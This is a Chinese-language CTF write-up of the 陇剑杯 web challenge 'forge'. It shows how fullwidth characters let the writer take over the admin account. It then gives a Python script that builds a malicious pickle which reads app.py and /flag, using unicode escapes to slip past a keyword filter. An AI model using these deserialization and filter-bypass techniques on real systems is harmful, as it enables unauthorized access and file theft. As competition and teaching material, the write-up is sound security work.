陇剑杯

web

forge

首先要登录，注册一个admin发现已经注册了，注册其他的又显示只能admin登录，这里利用全角字符绕过进行注册修改admin密码
ａｄｍｉｎ
成功登录，发现可以上传.pkl文件并运行，有一个example文件作为例子，下载下来看看

import pickle
import pickletools
with open("example.pkl", "rb") as f:
    pickletools.dis(f)

    0: \x80 PROTO      4
    2: \x95 FRAME      112
   11: \x8c SHORT_BINUNICODE '__main__'
   21: \x94 MEMOIZE    (as 0)
   22: \x8c SHORT_BINUNICODE 'CHIKAWA'
   31: \x94 MEMOIZE    (as 1)
   32: \x93 STACK_GLOBAL
   33: \x94 MEMOIZE    (as 2)
   34: )    EMPTY_TUPLE
   35: \x81 NEWOBJ
   36: \x94 MEMOIZE    (as 3)
   37: }    EMPTY_DICT
   38: \x94 MEMOIZE    (as 4)
   39: (    MARK
   40: \x8c     SHORT_BINUNICODE 'model_name'
   52: \x94     MEMOIZE    (as 5)
   53: \x8c     SHORT_BINUNICODE 'Example'
   62: \x94     MEMOIZE    (as 6)
   63: \x8c     SHORT_BINUNICODE 'data'
   69: \x94     MEMOIZE    (as 7)
   70: C        SHORT_BINBYTES b"cbuiltins\nprint\n(S'chikawa'\ntR."
  103: \x94     MEMOIZE    (as 8)
  104: \x8c     SHORT_BINUNICODE 'parameters'
  116: \x94     MEMOIZE    (as 9)
  117: \x8c     SHORT_BINUNICODE ''
  119: \x94     MEMOIZE    (as 10)
  120: u        SETITEMS   (MARK at 39)
  121: b    BUILD
  122: .    STOP
highest protocol among opcodes = 4

发现data数据中含有内嵌的pickle流，在网站上运行.pkl文件后会反序列化该data数据从而命令执行
仿造example.pkl文件写一个生成.pkl文件的脚本

import pickle

# 创建与目标结构匹配的自定义类
class CHIKAWA:
    def __init__(self):
        self.model_name = 'Example1'
        self.data = b"cbuiltins\nprint\n(S'chikawa'\ntR."
        self.parameters = ''

obj = CHIKAWA()
# 手动构建 pickle 字节序列
obj.data = b"""cpathlib
Path
p0
cbuiltins
getattr
(g0
S'read_text'
tRp1
cpathlib
PosixPath
(S'app.py'
tRp2
g1
(g2
tR.
"""

obj.data = b"""cpathlib
Path
p0
cbuiltins
getattr
(g0
S'read_text'
tRp1
cpathlib
PosixPath
(V\u002f\u0066\u006c\u0061\u0067
tRp2
g1
(g2
tR.
"""


blob = pickle.dumps(obj, protocol=4)
print(pickle.loads(blob))
# 保存到文件
with open('tast.pkl', 'wb') as f:
    f.write(blob)

通过构造 getattr(pathlib.Path, ‘read_text’)(pathlib.PosixPath(‘app.py’)) 读取 app.py
但是 flag 被过滤了，使用 unicode 编码绕过